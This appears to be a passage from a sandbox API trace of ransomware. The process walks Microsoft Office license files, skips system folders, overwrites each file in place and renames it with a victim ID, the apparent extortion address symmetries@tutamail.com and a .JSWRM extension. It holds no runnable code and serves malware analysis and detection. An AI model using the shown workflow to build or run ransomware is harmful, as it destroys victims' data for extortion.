ftCreationTime.dwLowDateTime=0xe415a524, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe415a524, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe423f37b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d69, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Trial2-ul-oob.xrm-ms", cAlternateFileName="HO4037~1.XRM")) returned 1 [0103.683] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.683] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.683] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.683] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.683] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.683] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.683] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.683] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.683] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.683] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial2-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0103.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial2-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Trial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0103.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0103.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial2-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0103.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial2-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Trial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0103.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0103.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0103.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0103.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0103.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.685] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11625) returned 1 [0103.685] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0103.685] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0103.688] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.688] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0103.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.688] CloseHandle (hObject=0x45c) returned 1 [0103.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0103.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0103.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0103.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0103.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0103.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0103.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0103.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0103.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.688] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0103.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0103.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0103.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.690] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe47e8ce2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe47e8ce2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4919fee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bcf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", cAlternateFileName="HO03E3~1.XRM")) returned 1 [0103.690] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", lpString2=".") returned 1 [0103.690] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", lpString2="..") returned 1 [0103.690] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", lpString2="...") returned 1 [0103.690] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", lpString2="windows") returned -1 [0103.690] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", lpString2="recovery") returned -1 [0103.690] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.690] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.690] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.690] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.690] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", lpString2="msocache") returned -1 [0103.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0103.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0103.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0103.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0103.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0103.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0103.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22ce70, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0103.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0103.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0103.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0103.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0103.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentdemor_bypasstrial180-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.691] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11215) returned 1 [0103.691] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0103.691] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0103.693] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.693] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0103.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.693] CloseHandle (hObject=0x45c) returned 1 [0103.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0103.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0103.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0103.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0103.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0103.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0103.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.694] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentdemor_bypasstrial180-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentDemoR_BypassTrial180-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentdemor_bypasstrial180-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0103.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0103.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0103.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.695] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe46b79f0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe46b79f0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4881625, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x54e9, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", cAlternateFileName="HO91BA~1.XRM")) returned 1 [0103.695] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", lpString2=".") returned 1 [0103.695] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", lpString2="..") returned 1 [0103.695] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", lpString2="...") returned 1 [0103.695] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", lpString2="windows") returned -1 [0103.695] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.695] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.695] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.695] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.695] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.695] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0103.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0103.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22ce70, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0103.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0103.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0103.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0103.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0103.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0103.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0103.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0103.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0103.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentdemor_bypasstrial180-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.696] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21737) returned 1 [0103.696] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x54e0) returned 0x24c1d0 [0103.696] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x54e0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x54e0, lpOverlapped=0x0) returned 1 [0103.699] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.699] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x54e0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x54e0, lpOverlapped=0x0) returned 1 [0103.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.699] CloseHandle (hObject=0x45c) returned 1 [0103.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0103.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0103.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0103.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0103.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0103.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | 